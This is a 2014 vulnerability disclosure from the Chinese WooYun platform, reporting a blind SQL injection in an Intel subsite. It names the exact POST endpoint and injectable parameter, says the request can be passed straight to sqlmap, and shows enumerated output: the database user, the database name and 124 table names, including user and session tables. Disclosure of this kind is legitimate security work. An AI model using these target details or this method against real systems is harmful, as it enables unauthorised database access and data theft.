当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2014-081773
漏洞标题:
英特尔公司某分站MySQL盲注
相关厂商:
intel.com
漏洞作者:
lijiejie
提交时间:
2014-11-02 22:29
修复时间:
2014-12-17 22:30
公开时间:
2014-12-17 22:30
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
10
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2014-11-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

英特尔公司某分站MySQL盲注,boolean based。

详细说明:

注入点:

POST http://networkbuilders.intel.com/endusers/index.php?option=com_spfiles&task=shortingData
companyName=telefonica&fieldName=title&shoringName=ASC


参数companyName可注入。

漏洞证明:

可直接扔给SQLmap即可。
current user: 'inb@localhost'
current database: 'inb_new'
数据表:

Database: inb_new
[124 tables]
+-------------------------------------------+
|  jos_cwa_product_category_map_22sept2014  |
| jos_csci_companymanager                   |
| jos_csci_pro_category                     |
| jos_csci_pro_pdf_download_track           |
| jos_csci_products                         |
| jos_cwa_product_category_map              |
| sdion_assets                              |
| sdion_associations                        |
| sdion_banner_clients                      |
| sdion_banner_tracks                       |
| sdion_banners                             |
| sdion_catalog_category                    |
| sdion_catalog_product                     |
| sdion_catalog_product_modification_note   |
| sdion_catalog_product_resource_xref       |
| sdion_catalog_product_specification_xref  |
| sdion_catalog_track_category              |
| sdion_catalog_track_contact_hit           |
| sdion_catalog_track_product_hit           |
| sdion_catalog_track_product_search        |
| sdion_categories                          |
| sdion_company_registration_company_detail |
| sdion_company_user_information            |
| sdion_companytracker                      |
| sdion_contact_details                     |
| sdion_content                             |
| sdion_content_frontpage                   |
| sdion_content_rating                      |
| sdion_content_types                       |
| sdion_contentitem_tag_map                 |
| sdion_contest_category                    |
| sdion_contest_form_details                |
| sdion_core_log_searches                   |
| sdion_docman_categories                   |
| sdion_docman_category_orderings           |
| sdion_docman_category_relations           |
| sdion_docman_company                      |
| sdion_docman_company_user                 |
| sdion_docman_documents                    |
| sdion_docman_documents_activity           |
| sdion_docman_documents_activity_master    |
| sdion_docman_documents_links              |
| sdion_docman_documents_version            |
| sdion_docman_mimetypes                    |
| sdion_download_track                      |
| sdion_extensions                          |
| sdion_extman_dependencies                 |
| sdion_extman_extensions                   |
| sdion_files_containers                    |
| sdion_files_thumbnails                    |
| sdion_finalcontest_details                |
| sdion_finder_filters                      |
| sdion_finder_links                        |
| sdion_finder_links_terms0                 |
| sdion_finder_links_terms1                 |
| sdion_finder_links_terms2                 |
| sdion_finder_links_terms3                 |
| sdion_finder_links_terms4                 |
| sdion_finder_links_terms5                 |
| sdion_finder_links_terms6                 |
| sdion_finder_links_terms7                 |
| sdion_finder_links_terms8                 |
| sdion_finder_links_terms9                 |
| sdion_finder_links_termsa                 |
| sdion_finder_links_termsb                 |
| sdion_finder_links_termsc                 |
| sdion_finder_links_termsd                 |
| sdion_finder_links_termse                 |
| sdion_finder_links_termsf                 |
| sdion_finder_taxonomy                     |
| sdion_finder_taxonomy_map                 |
| sdion_finder_terms                        |
| sdion_finder_terms_common                 |
| sdion_finder_tokens                       |
| sdion_finder_tokens_aggregate             |
| sdion_finder_types                        |
| sdion_languages                           |
| sdion_menu                                |
| sdion_menu_types                          |
| sdion_messages                            |
| sdion_messages_cfg                        |
| sdion_modules                             |
| sdion_modules_menu                        |
| sdion_newsfeeds                           |
| sdion_om_accessGroups                     |
| sdion_om_config                           |
| sdion_om_membershiptypes                  |
| sdion_om_panelTaskRelation                |
| sdion_om_panels                           |
| sdion_om_tasks                            |
| sdion_organization_user_details           |
| sdion_organization_user_details_old       |
| sdion_overrider                           |
| sdion_postinstall_messages                |
| sdion_productsearch_tbl_product           |
| sdion_redirect_links                      |
| sdion_registration_company                |
| sdion_resource_tracker                    |
| sdion_schemas                             |
| sdion_sdkform                             |
| sdion_secondary_member_job                |
| sdion_send_email_to_this                  |
| sdion_session                             |
| sdion_simplecustomrouter                  |
| sdion_sp_pdf_download_track               |
| sdion_summitreception                     |
| sdion_tags                                |
| sdion_template_styles                     |
| sdion_ucm_base                            |
| sdion_ucm_content                         |
| sdion_ucm_history                         |
| sdion_update_sites                        |
| sdion_update_sites_extensions             |
| sdion_updates                             |
| sdion_user_keys                           |
| sdion_user_notes                          |
| sdion_user_profiles                       |
| sdion_user_usergroup_map                  |
| sdion_usergroups                          |
| sdion_users                               |
| sdion_users_10_10_2014                    |
| sdion_viewlevels                          |
| sdion_weblinks                            |
| sdion_wf_profiles                         |
+-------------------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 lijiejie@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝